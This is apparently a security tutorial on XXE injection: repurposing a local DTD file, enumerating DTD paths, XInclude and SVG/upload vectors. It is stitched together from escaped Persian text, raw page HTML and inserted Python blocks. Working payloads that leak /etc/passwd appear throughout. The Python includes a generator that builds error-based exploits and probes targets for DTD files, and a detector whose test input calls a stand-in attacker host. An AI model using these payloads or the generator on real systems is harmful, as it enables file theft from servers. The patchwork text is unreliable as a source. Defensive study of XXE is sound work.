\u0631\u0627\u0647 \u062d\u0644 \u0686\u06cc\u0633\u062a\u061f\n\u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc\u060c \u0628\u0647 \u062e\u0627\u0637\u0631 \u06cc\u06a9 \u0627\u0633\u062a\u062b\u0646\u0627 \u062f\u0631 \u0632\u0628\u0627\u0646 XML\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0647\u0645\u200c\u0686\u0646\u0627\u0646 \u0628\u062a\u0648\u0627\u0646 \u067e\u06cc\u0627\u0645\u200e\u200c\u0647\u0627\u06cc \u062e\u0637\u0627\u06cc\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0628\u0627\u0634\u0646\u062f. \u062d\u0627\u0644 \u0627\u06cc\u0646 \u0627\u0633\u062a\u062b\u0646\u0627 \u0686\u06cc\u0633\u062a\u061f \u0627\u06af\u0631 \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 DTD \u06cc\u06a9 \u0633\u0646\u062f XML\u060c \u062a\u0631\u06a9\u06cc\u0628\u06cc \u0627\u0632 \u06cc\u06a9 DTD \u062f\u0627\u062e\u0644\u06cc \u0648 \u06cc\u06a9 DTD \u062e\u0627\u0631\u062c\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f\u060c \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a DTD \u062f\u0627\u062e\u0644\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u062f\u0631 DTD \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u062f. 
\u0648\u0642\u062a\u06cc \u0627\u06cc\u0646 \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc\u200c\u0627\u0641\u062a\u062f\u060c \u0645\u062d\u062f\u0648\u062f\u06cc\u062a \u0639\u062f\u0645 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u0627\u062e\u0644 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631\u060c \u0628\u0631\u062f\u0627\u0634\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\u0627\u06cc\u0646 \u06cc\u0639\u0646\u06cc \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9 XXE \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0627\u0631\u0648\u0631 \u062f\u0631 \u06cc\u06a9 DTD \u062f\u0627\u062e\u0644\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f\u060c \u0648\u0644\u06cc \u0641\u0642\u0637 \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u06a9\u0647 \u0642\u0635\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u0631\u0627 \u062f\u0627\u0631\u062f\u060c \u062f\u0627\u062e\u0644 \u06cc\u06a9 DTD \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f \u0648 DTD \u062f\u0627\u062e\u0644\u06cc \u062f\u0648\u0628\u0627\u0631\u0647 \u0622\u0646 \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u062f. 
\u0627\u0644\u0628\u062a\u0647 \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u06af\u0641\u062a\u06cc\u0645\u060c \u0627\u06cc\u0646 \u0631\u0627\u0647 \u062d\u0644 \u0628\u0631\u0627\u06cc \u0632\u0645\u0627\u0646\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0627\u062a\u0635\u0627\u0644\u0627\u062a out-of-band \u0628\u0644\u0627\u06a9 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 External DTD \u0631\u0627 \u0627\u0632 \u06cc\u06a9 \u0633\u0631\u0648\u0631 \u062e\u0627\u0631\u062c\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f. \u062f\u0631 \u0639\u0648\u0636\u060c \u0628\u0627\u06cc\u062f \u0641\u0627\u06cc\u0644 DTD \u062e\u0627\u0631\u062c\u06cc \u0631\u0627 \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u060c \u06cc\u06a9 \u0622\u062f\u0631\u0633 \u0644\u0648\u06a9\u0627\u0644 \u0645\u062d\u0633\u0648\u0628 \u0634\u0648\u062f. 
\u06cc\u0639\u0646\u06cc \u0627\u0633\u0627\u0633\u0627 \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u0631\u0627 \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0645\u062d\u0644\u06cc \u0633\u0631\u0648\u0631 \u0647\u062f\u0641 \u067e\u06cc\u062f\u0627 \u06a9\u0631\u062f\u060c \u0633\u067e\u0633 \u06cc\u06a9\u06cc \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u0627\u0632 \u0642\u0628\u0644 \u062f\u0631\u0648\u0646 \u0622\u0646 \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0628\u0647 \u06af\u0648\u0646\u0647\u200c\u0627\u06cc \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0634\u0648\u062f.\n\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0641\u0631\u0636 \u06a9\u0646\u06cc\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0633\u0631\u0648\u0631 \u0648 \u062f\u0631 \u0622\u062f\u0631\u0633 \/usr\/local\/app\/schema.dtd \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f\u060c \u0648 \u062f\u0631 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 DTD\u060c \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0628\u0647 \u0646\u0627\u0645 custom_entity \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0627\u0633\u062a. 
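Every variant in this section (the out-of-band DTD fetch, the error-based DTD, and the local-DTD trick shown next) depends on the application's parser processing a DOCTYPE that declares parameter entities. What follows is an added example, not code from the original article: a defender-side check in Python that inspects incoming XML for those DTD constructs (for logging and alerting), refuses any document carrying a DOCTYPE before it reaches the parser, and returns only a generic error to the client so that parser exceptions like the FileNotFoundException above never end up in the response. The sample payloads are the shapes shown on this page, embedded as constructed test input; the function names and the stockCheck element are assumptions for a hypothetical endpoint.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed test inputs. The two payloads follow the shapes shown in the
# article (out-of-band DTD fetch and the hybrid local-DTD variant); the
# <stockCheck> root element is an assumption for a hypothetical endpoint.
OOB_PAYLOAD = (
    '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>'
    "<stockCheck><productId>1</productId></stockCheck>"
)
HYBRID_DTD_PAYLOAD = """<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]><stockCheck><productId>1</productId></stockCheck>"""
BENIGN = "<stockCheck><productId>381</productId></stockCheck>"

# Matching is case-insensitive on purpose: XML keywords are upper-case, but a
# detector should not be bypassed by a lenient parser.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%\s*\w+", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# '&#x25;' / '&#37;' is how a '%' is smuggled into an entity's literal value so
# that one parameter entity declares another (the "dynamic declaration" above).
NESTED_DECL_RE = re.compile(r"&#x25;|&#37;", re.IGNORECASE)
SCHEME_RE = re.compile(r"(?:SYSTEM|PUBLIC)\s+[\"']\s*(file|https?|ftp):", re.IGNORECASE)


def inspect_xml(doc: str) -> List[str]:
    """Return a sorted list of DTD-related findings for the server log / SIEM."""
    findings = set()
    if DOCTYPE_RE.search(doc):
        findings.add("doctype")
    if PARAM_ENTITY_RE.search(doc):
        findings.add("parameter_entity")
    if EXTERNAL_ENTITY_RE.search(doc):
        findings.add("external_entity")
    if NESTED_DECL_RE.search(doc):
        findings.add("nested_entity_declaration")
    for m in SCHEME_RE.finditer(doc):
        findings.add("scheme:" + m.group(1).lower())
    return sorted(findings)


def safe_parse(doc: str) -> ET.Element:
    """Refuse any document that carries a DTD, then parse with the stdlib parser."""
    if DOCTYPE_RE.search(doc):
        raise ValueError("DOCTYPE declarations are not accepted")
    return ET.fromstring(doc)


def handle_upload(doc: str) -> Tuple[int, str, List[str]]:
    """Hypothetical endpoint: (HTTP status, response body, findings for the server log)."""
    findings = inspect_xml(doc)
    try:
        root = safe_parse(doc)
    except (ValueError, ET.ParseError):
        # Only a generic message goes to the client; the exception text (which
        # could carry a path or an entity's expanded value) stays server-side.
        return 400, "invalid XML", findings
    return 200, "accepted <%s>" % root.tag, findings


if __name__ == "__main__":
    for name, body in (("oob", OOB_PAYLOAD), ("hybrid", HYBRID_DTD_PAYLOAD), ("benign", BENIGN)):
        status, message, findings = handle_upload(body)
        print(name, status, message, findings)
```

Rejecting every DOCTYPE is the simplest robust policy and is what most XXE hardening guidance recommends; if an application genuinely needs DTDs, the inspection findings still give the detection team a signal for parameter entities, external entities and nested declarations, which legitimate documents almost never contain.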
By submitting a hybrid DTD like the one below, the attacker can trigger a parsing error containing the contents of \/etc\/passwd:<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n
<p dir=\"ltr\" style=\"text-align: left;\"><code>&lt;!DOCTYPE foo [<br \/>&lt;!ENTITY % local_dtd SYSTEM &quot;file:\/\/\/usr\/local\/app\/schema.dtd&quot;&gt;<br \/>&lt;!ENTITY % custom_entity &#39;<br \/>&lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:\/\/\/etc\/passwd&quot;&gt;<br \/>&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:\/\/\/nonexistent\/&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;<br \/>&amp;#x25;eval;<br \/>&amp;#x25;error;<br \/>&#39;&gt;<br \/>%local_dtd;<br \/>]&gt;<\/code><\/p>
<p>This DTD performs the following steps:<\/p>
<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2859d6c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2859d6c\" data-element_type=\"section\" data-e-type=\"section\">\n<div class=\"elementor-container elementor-column-gap-default\">\n<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-9d37d51\" data-id=\"9d37d51\" data-element_type=\"column\" data-e-type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-b64fb70 elementor-widget elementor-widget-text-editor\" data-id=\"b64fb70\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n<div class=\"elementor-widget-container\">\n<ul><li><span style=\"font-size: 10pt;\"><strong>Declares a parameter entity named local_dtd, containing the contents of the external DTD file that already exists on the server's filesystem. 
It then declares a parameter entity with the same name, custom_entity, as one the external DTD already declares. Strictly speaking this pre-empts the original rather than redefining it: the internal subset is processed before %local_dtd; is expanded, and an XML parser binds an entity name to the first declaration it meets, so the declaration inside the external DTD is ignored. The replacement text supplied here is the error-based XXE exploit described in the earlier sections, and it produces an error message containing the contents of \/etc\/passwd.<\/strong><\/span><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ad36f38\" data-id=\"ad36f38\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a745c57 elementor-widget elementor-widget-text-editor\" data-id=\"a745c57\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<ul><li><span style=\"font-size: 10pt;\"><strong>It then references the local_dtd entity. This makes the parser interpret the external DTD, and when that DTD in turn references custom_entity the parser expands the attacker's declaration of it. 
So referencing local_dtd is what triggers the error message we are after.<\/strong><\/span><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3a8c56f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3a8c56f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b63755d\" data-id=\"b63755d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-14ffbb3 elementor-widget elementor-widget-text-editor\" data-id=\"14ffbb3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h5 id=\"find-local-dtd\"><span style=\"font-size: 12pt;\">Finding an existing DTD file to repurpose<\/span><\/h5>\nBecause this variant of XXE repurposes a DTD file that already exists on the server's filesystem, the first job is to find a suitable file. That is usually straightforward. When the application returns the error messages produced by its XML parser, you can enumerate local DTD files simply by trying to load each candidate from the internal DTD: a path that does not exist produces a parser error, while a path that does exist produces none. (If the application swallows parser errors, the probe only helps when some other difference in the response, such as the status code or timing, separates the two cases.)\n\nFor example, Linux systems that use the GNOME desktop environment often have a DTD at \/usr\/share\/yelp\/dtd\/docbookx.dtd. You can test whether that file is present by submitting the following XXE payload, which produces an error if the file is missing:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f3c070f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f3c070f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c670df5\" data-id=\"c670df5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0e312a7 elementor-widget elementor-widget-text-editor\" data-id=\"0e312a7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY % local_dtd SYSTEM &quot;file:\/\/\/usr\/share\/yelp\/dtd\/docbookx.dtd&quot;&gt;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>%local_dtd;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>]&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1c4d393 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1c4d393\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-56eb403\" data-id=\"56eb403\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fb37796 elementor-widget elementor-widget-text-editor\" data-id=\"fb37796\" data-element_type=\"widget\" data-e-type=\"widget\" 
data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tOnce you have worked through a list of common DTD locations and found one that exists, you need a copy of that file so you can read it and pick out a parameter entity that it both declares and later references; that is the entity you will pre-empt, since a declaration the local DTD never references would have no effect. 
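Putting the enumeration step and the hybrid DTD together, as an added example that is mine and not code from the article: a small Python helper that builds the probe and the error-based payload for any local DTD path, entity name and target file, and shows why the parameter-entity references inside the payload are written as character references (the &amp;#x25; and &amp;#x26;#x25; forms above). The function names pct, expand_once, probe_payload, hybrid_dtd and enumerate_local_dtds are my own; enumerate_local_dtds takes the HTTP-submitting step as a caller-supplied callable, so nothing here touches the network.

```python
"""Added example (not the page's own code): build and sanity-check the
"local DTD" payloads described above, using only the standard library.

Inside an entity literal a bare '%' is a parameter-entity reference that
the parser expands immediately, so a '%' that must survive N passes of
entity-literal parsing is written as a character reference wrapped N-1
times: '&#x25;', then '&#x26;#x25;', and so on.
"""
import re

CHARREF = re.compile(r"&#x([0-9A-Fa-f]+);")


def pct(passes: int) -> str:
    """A '%' that becomes a live parameter-entity reference only after
    `passes` rounds of entity-literal expansion."""
    if passes < 1:
        return "%"
    return "&" + "#x26;" * (passes - 1) + "#x25;"


def expand_once(literal: str) -> str:
    """One pass of character-reference replacement, as a parser performs
    when it reads an entity literal (the result is not rescanned)."""
    return CHARREF.sub(lambda m: chr(int(m.group(1), 16)), literal)


def probe_payload(local_dtd_uri: str) -> str:
    """Internal subset that only loads a candidate local DTD: a parser
    error means the file is missing, no error means it exists."""
    return ("<!DOCTYPE foo [\n"
            f'<!ENTITY % local_dtd SYSTEM "{local_dtd_uri}">\n'
            "%local_dtd;\n"
            "]>")


def hybrid_dtd(local_dtd_uri: str, entity: str, target_uri: str,
               sink: str = "file:///nonexistent/") -> str:
    """Internal subset that pre-empts parameter entity `entity` of the
    local DTD with an error-based XXE leaking `target_uri` in the error."""
    p1, p2 = pct(1), pct(2)   # live after one, resp. two, literal passes
    # Quotes inside the outer literal must be character references too
    # (&#x27;), or they would terminate the custom entity's literal early.
    body = (
        f'<!ENTITY {p1} file SYSTEM "{target_uri}">\n'
        f'<!ENTITY {p1} eval "<!ENTITY {p2} error SYSTEM '
        f"&#x27;{sink}{p1}file;&#x27;>\">\n"
        f"{p1}eval;\n"
        f"{p1}error;\n"
    )
    return ("<!DOCTYPE foo [\n"
            f'<!ENTITY % local_dtd SYSTEM "{local_dtd_uri}">\n'
            f"<!ENTITY % {entity} '\n{body}'>\n"
            "%local_dtd;\n"
            "]>")


def enumerate_local_dtds(candidates, parser_errors):
    """Return the candidate paths that exist on the target.
    `parser_errors(payload)` must submit the payload and report whether the
    response carried an XML parser error; the caller supplies it (an HTTP
    client, a Burp extension, ...)."""
    return [path for path in candidates
            if not parser_errors(probe_payload("file://" + path))]


def external_dtd_view(payload: str) -> str:
    """What the external DTD sees when it references the pre-empted entity:
    the literal between the first pair of single quotes, expanded once."""
    return expand_once(payload.split("'")[1])


if __name__ == "__main__":
    # Constructed candidate list: the article's GNOME example plus one more.
    print(hybrid_dtd("file:///usr/share/yelp/dtd/docbookx.dtd",
                     "custom_entity", "file:///etc/passwd"))
    print(external_dtd_view(hybrid_dtd("file:///x.dtd", "e", "file:///etc/passwd")))
```

external_dtd_view is the quickest way to check an adapted payload before sending it: after one expansion the inner declaration must read `<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">`, with %file; already live and one more &#x25; left for the final pass.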
Because many common systems that ship DTD files are open source, you can usually find a copy of the file you need with a quick internet search.\n<h3 id=\"attack-surface\"><span style=\"font-size: 18pt;\">Finding hidden attack surface for XXE injection<\/span><\/h3>\nIn many cases the attack surface for XXE injection is obvious, because the application's normal HTTP traffic includes requests that carry XML-formatted data. In other cases the attack surface is less visible. 
Even so, if you look in the right places you will find XXE attack surface in requests that contain no XML-formatted data at all.\n<h4 id=\"xinclude\"><span style=\"font-size: 12pt;\">XInclude attacks<\/span><\/h4>\nSome applications receive data submitted by the client, embed it server-side into an XML document, and then parse that document. 
One example is client-submitted data that is placed into a back-end SOAP request, which is then processed by the back-end SOAP service.\nIn this situation you cannot carry out a classic XXE attack, because you do not control the whole XML document and so cannot define or modify a DOCTYPE element. You may, however, be able to use XInclude instead. 
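The scenario just described, end to end, as an added example that is not part of the original article: a hypothetical back-end (the names build_envelope, process_vulnerable and process_hardened are mine) drops one client-supplied value into its own XML envelope and then runs Python's standard-library XInclude processor over the result. The only thing the attacker controls is that value. The secret file is constructed in a temporary directory so the example runs anywhere; note that ElementInclude's default loader treats href as a filesystem path rather than a file:\/\/ URI (processors such as libxml2 accept the URI form), so the payload here uses a bare path.

```python
"""Added example (not the page's own code): XInclude injection through a
single injected value, using only Python's standard library."""
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XI_NS = "http://www.w3.org/2001/XInclude"


def build_envelope(user_value: str) -> str:
    # Hypothetical server-side template. The value is not escaped, which is
    # what lets the client smuggle an xi:include element into the document.
    return f"<request><item>{user_value}</item></request>"


def process_vulnerable(user_value: str) -> str:
    root = ET.fromstring(build_envelope(user_value))
    # The default loader opens href as a local path and splices the file in.
    ElementInclude.include(root)
    return "".join(root.itertext())


def process_hardened(user_value: str) -> str:
    # Same pipeline, but the include step is given a loader that refuses
    # every href; untrusted documents should never drive XInclude.
    def refuse(href, parse, encoding=None):
        raise ElementInclude.FatalIncludeError(f"XInclude of {href!r} refused")
    root = ET.fromstring(build_envelope(user_value))
    ElementInclude.include(root, loader=refuse)
    return "".join(root.itertext())


def xinclude_payload(path: str) -> str:
    # parse="text" pulls the file in verbatim; the default parse="xml"
    # would choke on a non-XML file such as /etc/passwd.
    return (f'<foo xmlns:xi="{XI_NS}">'
            f'<xi:include parse="text" href="{path}"/></foo>')


def write_secret_file() -> str:
    # Constructed stand-in for /etc/passwd so the example runs anywhere.
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    return path


def run_demo():
    """Returns (text the vulnerable path leaks, whether the hardened path
    refused the include)."""
    secret = write_secret_file()
    try:
        leaked = process_vulnerable(xinclude_payload(secret))
        try:
            process_hardened(xinclude_payload(secret))
            refused = False
        except ElementInclude.FatalIncludeError:
            refused = True
    finally:
        os.remove(secret)
    return leaked, refused


if __name__ == "__main__":
    leaked, refused = run_demo()
    print("vulnerable pipeline returned:", leaked.strip())
    print("hardened pipeline refused the include:", refused)
```

The refusing loader is a backstop, not the fix. The root cause is that build_envelope concatenates raw input into markup; escaping the value with xml.sax.saxutils.escape turns the injected element into harmless text, and XInclude processing should not run on documents built from client data at all.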
XInclude is a W3C specification built on XML that lets an XML document be assembled from several sub-documents. An XInclude attack can be placed in any data value inside an XML document, so it works even when the only thing you control is a single item of data that the server drops into an XML document of its own. To carry out an XInclude attack you reference the XInclude namespace and give the path of the file you want included (the file whose contents are pulled into the document). The parse=&quot;text&quot; attribute matters: it pulls the target in as raw text, which is what you need for a non-XML file such as \/etc\/passwd, whereas the default, parse=&quot;xml&quot;, would fail on it. Whether the attack works at all depends on the application having enabled XInclude processing in its parser, and on whether that parser accepts a file:\/\/ URI or only a plain path:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8dadd1b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8dadd1b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5a53d0f\" data-id=\"5a53d0f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8a7668b elementor-widget elementor-widget-text-editor\" data-id=\"8a7668b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;foo xmlns:xi=&quot;http:\/\/www.w3.org\/2001\/XInclude&quot;&gt;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;xi:include parse=&quot;text&quot; href=&quot;file:\/\/\/etc\/passwd&quot;\/&gt;&lt;\/foo&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8971c2c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" 
data-id=\"8971c2c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-04dc5d7\" data-id=\"04dc5d7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cb95748 elementor-widget elementor-widget-text-editor\" data-id=\"cb95748\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h4 id=\"file-upload\">XXE attacks via file upload<\/h4>\nSome applications allow users to upload files, which are then processed server-side. Some common file formats use XML or contain XML sub-components. 
For example, Office documents such as DOCX and image formats such as SVG are XML-based.\nSuppose, for instance, that an application lets users upload images and processes or validates them on the server after upload. Even if the application expects formats such as PNG or JPEG, the image-processing library used on the server side may also support SVG images. 
Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.\n<h4 id=\"content-format\">XXE attacks via modified content type<\/h4>\nMost POST requests use the default content type generated by HTML forms, application\/x-www-form-urlencoded. 
